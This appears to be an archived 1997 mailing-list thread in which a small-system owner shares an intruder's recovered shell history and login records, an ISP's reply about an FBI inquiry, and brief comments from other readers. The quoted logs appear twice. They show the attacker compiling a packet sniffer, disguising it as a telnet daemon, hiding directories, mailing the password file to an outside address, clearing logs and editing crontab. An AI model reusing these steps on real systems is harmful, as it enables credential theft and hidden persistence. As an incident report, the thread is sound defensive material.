System Attack & FBI (fwd)
Hi, For your amusement. Jim Choate CyberTects ravage@ssz.com Forwarded message:
From ravage@ssz.com Fri May 23 23:28:29 1997 From: Jim Choate <ravage@ssz.com> Message-Id: <199705240428.XAA22380@einstein.ssz.com> Subject: System Attack & FBI To: users@einstein.ssz.com Date: Fri, 23 May 1997 23:28:27 -0500 (CDT) Cc: staff@einstein.ssz.com X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 7477
Hi,
As you will see below I have been tracking a waskelly wabbit for the last few weeks. I apologize for any interference with your access but I could not let it go without some sort of responce.
I *STRONGLY* advise you to change your password immediately.
I do not expect anyone other than myself to have to talk with the FBI.
If you have any questions please feel free to email me.
Jim Choate CyberTects ravage@ssz.com
Forwarded message:
From rberger@rberger.com Fri May 23 23:13:34 1997 Message-Id: <3.0.1.32.19970523234327.006eefec@rberger.com> X-Sender: rberger@rberger.com X-Mailer: Windows Eudora Pro Version 3.0.1 (32) Date: Fri, 23 May 1997 23:43:27 -0500 To: Jim Choate <ravage@einstein.ssz.com> From: rberger <rberger@rberger.com> Subject: Re: You have a hacker! In-Reply-To: <199705240343.WAA22299@einstein.ssz.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"
Thank you very much for sending us an e-mail and your logs. We are going through our FTP logs at this time. Although initial results don't show corresponding ftps at these times or files. Although a week ago we were fighting a hacker using the a same techquies as shown by the telnet sessions. So we will be monitoring everything very closely here for a few more days. Our next search will be the accounts logged in on these ports at the times given. We have been working with the FBI, along with several other ISP's in Dallas. If you capture any other logs please send them again to root@applink.net. If you dont hear anything from us in less than 24 hours please re-send your e-mail message again to my domain rberger@rberger.com just in case the root e-mail/logs are being monitored & modified.
Regards,
Randall Berger, CEO AppLink Corporation
At 10:43 PM 5/23/97 -0500, you wrote:
Hello,
My name is Jim Choate, I own and operate CyberTects a small office - home office consultancy in Austin, TX. Over the last couple of weeks I have been tracking an intrusion on my system that has involved your systems. I would appreciate any help you can provide in resolving this issue.
I believe a home account for the perp is dkny007@hotmail.com
I will attach below the relevant files.
Jim Choate CyberTects ravage@ssz.com
--------------------------------------------------------------------------
bbixler ttyp0 app42-73.applink Fri May 23 16:04 - 16:06 (00:01) bbixler ttyp0 app42-75.applink Fri May 23 00:21 - 00:28 (00:07) bbixler ttyp0 app42-90.applink Thu May 22 13:33 - 13:37 (00:03) bbixler ttyp0 app41-50.applink Wed May 21 20:01 - 20:31 (00:30) bbixler ttyp0 app41-47.applink Wed May 21 19:53 - 19:54 (00:00) bbixler ttyp0 app42-85.applink Wed May 21 18:46 - 19:00 (00:14) bbixler ttyp0 app42-75.applink Wed May 21 10:39 - 10:40 (00:00) bbixler ttyp0 app41-52.applink Sun May 18 23:04 - 23:11 (00:07) bbixler ttyp1 app42-78.applink Sat May 17 18:46 - 18:49 (00:02) bbixler ttyp1 app42-67.applink Sat May 17 01:22 - 01:26 (00:03) bbixler ftp fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28 (00:01) bbixler ttyp1 app42-94.applink Tue May 13 16:12 - 16:18 (00:05) bbixler ttyp0 app42-85.applink Mon May 12 17:02 - 17:05 (00:02) bbixler ttyp0 app42-73.applink Sun May 11 12:29 - 12:36 (00:07) bbixler ttyp0 app42-71.applink Sat May 10 20:15 - 20:17 (00:01) bbixler ttyp0 app42-71.applink Sat May 10 19:40 - 19:50 (00:09) bbixler ttyp0 max2-800-04.eart Wed Feb 12 18:05 - 18:06 (00:00)
wtmp begins Sun Feb 2 16:36
--------------------------------------------------------------------------
whoami ls mv perl-ex.sh /tmp/.bgg mkdir /tmp/.bg cd /tmp cd .bg ls lynx ls gcc linsniffer.c ls ps who w ps aux a.out & ls ifconfig /sbin/ifconfig ls tail -f tcp.log free ls cat tcp.log cd .. ls w cd cd .. ls cd .. cd /etc ls minicom cd .. ls cd cdrom. cd cdrom ls cd .. cd ls cd bin ls cd .. cd .. ls w finger cd Pphantom cat /etc/passwd | grep Pphantom cd phantom ls ls -al cat .bash_history cd /etc cat hosts ls cd /tmp cd .bg cat tcp.log exit cd .bg ls w ls ls -al cat tcp.log ifconfig /sbin/ifconfig ls exit mv x.sh /tmp cd .bg ls cd /tmp ls mv x.sh .bg cd .bg ls kill -9 14523 ps aux mv a.out in.telnetd ls rm tcp.log ./in.telnetd & exit pico tcp.log ls ps aux kill -9 16282 ls ./in.telnetd & exit cat /dev/null > tcp.log w exit pico tcp.log ls ls -al cd /etc cat passwd mail dkny007@hotmail.com < passwd exit w ls -al pico tcp.log echo /dev/null > tcp.log ls -al ps aux quit exit id w ftp ls mkdir /home/ftp/.tmp mkdir /home/ftp/.tmp/.sub mv linsniff /home/ftp/.tmp/.sub/ cd /home/ftp/.tmp/.sub/ mv linsniff in.te1netd ls -l chmod 755 in.te1netd in.te1netd & ps ps aux killall in.te1netd ls ls -a ls -l in.te1netd & /home/ftp/.tmp/.sub/in.te1netd /home/ftp/.tmp/.sub/in.te1netd ls -s rm in.te1netd cd ls mv hello .h311o ftp ls mv linsniffer.c /home/ftp/.tmp/.sub/ cd /home/ftp/.tmp/.sub ls cc linsniffer.c mv a.out in.te1netd chmod 755 in.te1netd ls rm linsniffer.c in.te1netd & exit cd .. mv apache.tgz .bg cd .bg ls tar xfvz apache.tgz cd apache_1.2b10/ ls cd src make ls ./Configure make ls cd .. ls cd cgi-bin/ ls cd .. ls cd .. ls w rm -rf apache* lynx ls tar xfvz apache_1.1.3.tar.gz cd apache_1.1.3 ls cd src ls ./Configure make ls cd .. ls cd .. ls rm -rf apache_1.1.3 ls rm -rf apache_1.1.3.tar.gz w exit kill -9 14551 ls ls -al cd .. ls cd /home ls cd ftp ls -al cd .tm[p cd .tmp/ ls ls -al cd .sub/ ls rm * cd .. cd .. rm -rf .tmp/ ls cd ls cd /root ls cd ssz ls cd .. ls cd pgp ls cd .. cd etc ls cd .. ls cd / ls exit id crontab -e ls vi .sub crontab -e ls cat /home/ftp/.tmp/.sub/tcp.log ps aux who cd /home/ftp ls -a mkdir .tmp/.sub mkdir .tmp cd .tmp exit cd ls cd /root ls cd khg-0.5/ ls cd .. cat .bash_history ls cd /etc ls cat hosts exit
Jim, I was almost in tears as I was reading your logs. Instead of simply asking your users to change passwords (always a great idea!) please let them know that multiuser Unix systems never offer any real security or privacy to the users. I hope that the hacker did not leave any other trojans besides rogue Apache and in.telnetd. igor Jim Choate wrote:
Hi,
For your amusement.
Jim Choate CyberTects ravage@ssz.com
Forwarded message:
From ravage@ssz.com Fri May 23 23:28:29 1997 From: Jim Choate <ravage@ssz.com> Message-Id: <199705240428.XAA22380@einstein.ssz.com> Subject: System Attack & FBI To: users@einstein.ssz.com Date: Fri, 23 May 1997 23:28:27 -0500 (CDT) Cc: staff@einstein.ssz.com X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 7477
Hi,
As you will see below I have been tracking a waskelly wabbit for the last few weeks. I apologize for any interference with your access but I could not let it go without some sort of responce.
I *STRONGLY* advise you to change your password immediately.
I do not expect anyone other than myself to have to talk with the FBI.
If you have any questions please feel free to email me.
Jim Choate CyberTects ravage@ssz.com
Forwarded message:
From rberger@rberger.com Fri May 23 23:13:34 1997 Message-Id: <3.0.1.32.19970523234327.006eefec@rberger.com> X-Sender: rberger@rberger.com X-Mailer: Windows Eudora Pro Version 3.0.1 (32) Date: Fri, 23 May 1997 23:43:27 -0500 To: Jim Choate <ravage@einstein.ssz.com> From: rberger <rberger@rberger.com> Subject: Re: You have a hacker! In-Reply-To: <199705240343.WAA22299@einstein.ssz.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"
Thank you very much for sending us an e-mail and your logs. We are going through our FTP logs at this time. Although initial results don't show corresponding ftps at these times or files. Although a week ago we were fighting a hacker using the a same techquies as shown by the telnet sessions. So we will be monitoring everything very closely here for a few more days. Our next search will be the accounts logged in on these ports at the times given. We have been working with the FBI, along with several other ISP's in Dallas. If you capture any other logs please send them again to root@applink.net. If you dont hear anything from us in less than 24 hours please re-send your e-mail message again to my domain rberger@rberger.com just in case the root e-mail/logs are being monitored & modified.
Regards,
Randall Berger, CEO AppLink Corporation
At 10:43 PM 5/23/97 -0500, you wrote:
Hello,
My name is Jim Choate, I own and operate CyberTects a small office - home office consultancy in Austin, TX. Over the last couple of weeks I have been tracking an intrusion on my system that has involved your systems. I would appreciate any help you can provide in resolving this issue.
I believe a home account for the perp is dkny007@hotmail.com
I will attach below the relevant files.
Jim Choate CyberTects ravage@ssz.com
--------------------------------------------------------------------------
bbixler ttyp0 app42-73.applink Fri May 23 16:04 - 16:06 (00:01) bbixler ttyp0 app42-75.applink Fri May 23 00:21 - 00:28 (00:07) bbixler ttyp0 app42-90.applink Thu May 22 13:33 - 13:37 (00:03) bbixler ttyp0 app41-50.applink Wed May 21 20:01 - 20:31 (00:30) bbixler ttyp0 app41-47.applink Wed May 21 19:53 - 19:54 (00:00) bbixler ttyp0 app42-85.applink Wed May 21 18:46 - 19:00 (00:14) bbixler ttyp0 app42-75.applink Wed May 21 10:39 - 10:40 (00:00) bbixler ttyp0 app41-52.applink Sun May 18 23:04 - 23:11 (00:07) bbixler ttyp1 app42-78.applink Sat May 17 18:46 - 18:49 (00:02) bbixler ttyp1 app42-67.applink Sat May 17 01:22 - 01:26 (00:03) bbixler ftp fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28 (00:01) bbixler ttyp1 app42-94.applink Tue May 13 16:12 - 16:18 (00:05) bbixler ttyp0 app42-85.applink Mon May 12 17:02 - 17:05 (00:02) bbixler ttyp0 app42-73.applink Sun May 11 12:29 - 12:36 (00:07) bbixler ttyp0 app42-71.applink Sat May 10 20:15 - 20:17 (00:01) bbixler ttyp0 app42-71.applink Sat May 10 19:40 - 19:50 (00:09) bbixler ttyp0 max2-800-04.eart Wed Feb 12 18:05 - 18:06 (00:00)
wtmp begins Sun Feb 2 16:36
--------------------------------------------------------------------------
whoami ls mv perl-ex.sh /tmp/.bgg mkdir /tmp/.bg cd /tmp cd .bg ls lynx ls gcc linsniffer.c ls ps who w ps aux a.out & ls ifconfig /sbin/ifconfig ls tail -f tcp.log free ls cat tcp.log cd .. ls w cd cd .. ls cd .. cd /etc ls minicom cd .. ls cd cdrom. cd cdrom ls cd .. cd ls cd bin ls cd .. cd .. ls w finger cd Pphantom cat /etc/passwd | grep Pphantom cd phantom ls ls -al cat .bash_history cd /etc cat hosts ls cd /tmp cd .bg cat tcp.log exit cd .bg ls w ls ls -al cat tcp.log ifconfig /sbin/ifconfig ls exit mv x.sh /tmp cd .bg ls cd /tmp ls mv x.sh .bg cd .bg ls kill -9 14523 ps aux mv a.out in.telnetd ls rm tcp.log ./in.telnetd & exit pico tcp.log ls ps aux kill -9 16282 ls ./in.telnetd & exit cat /dev/null > tcp.log w exit pico tcp.log ls ls -al cd /etc cat passwd mail dkny007@hotmail.com < passwd exit w ls -al pico tcp.log echo /dev/null > tcp.log ls -al ps aux quit exit id w ftp ls mkdir /home/ftp/.tmp mkdir /home/ftp/.tmp/.sub mv linsniff /home/ftp/.tmp/.sub/ cd /home/ftp/.tmp/.sub/ mv linsniff in.te1netd ls -l chmod 755 in.te1netd in.te1netd & ps ps aux killall in.te1netd ls ls -a ls -l in.te1netd & /home/ftp/.tmp/.sub/in.te1netd /home/ftp/.tmp/.sub/in.te1netd ls -s rm in.te1netd cd ls mv hello .h311o ftp ls mv linsniffer.c /home/ftp/.tmp/.sub/ cd /home/ftp/.tmp/.sub ls cc linsniffer.c mv a.out in.te1netd chmod 755 in.te1netd ls rm linsniffer.c in.te1netd & exit cd .. mv apache.tgz .bg cd .bg ls tar xfvz apache.tgz cd apache_1.2b10/ ls cd src make ls ./Configure make ls cd .. ls cd cgi-bin/ ls cd .. ls cd .. ls w rm -rf apache* lynx ls tar xfvz apache_1.1.3.tar.gz cd apache_1.1.3 ls cd src ls ./Configure make ls cd .. ls cd .. ls rm -rf apache_1.1.3 ls rm -rf apache_1.1.3.tar.gz w exit kill -9 14551 ls ls -al cd .. ls cd /home ls cd ftp ls -al cd .tm[p cd .tmp/ ls ls -al cd .sub/ ls rm * cd .. cd .. rm -rf .tmp/ ls cd ls cd /root ls cd ssz ls cd .. ls cd pgp ls cd .. cd etc ls cd .. ls cd / ls exit id crontab -e ls vi .sub crontab -e ls cat /home/ftp/.tmp/.sub/tcp.log ps aux who cd /home/ftp ls -a mkdir .tmp/.sub mkdir .tmp cd .tmp exit cd ls cd /root ls cd khg-0.5/ ls cd .. cat .bash_history ls cd /etc ls cat hosts exit
- Igor.
ichudov@algebra.com (Igor Chudov @ home) writes: ...
I hope that the hacker did not leave any other trojans besides rogue Apache and in.telnetd. ... The cracker installed Stronghold[tm] on Jim's system? How despicable!
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
participants (3)
-
dlv@bwalk.dm.com -
ichudov@algebra.com -
Jim Choate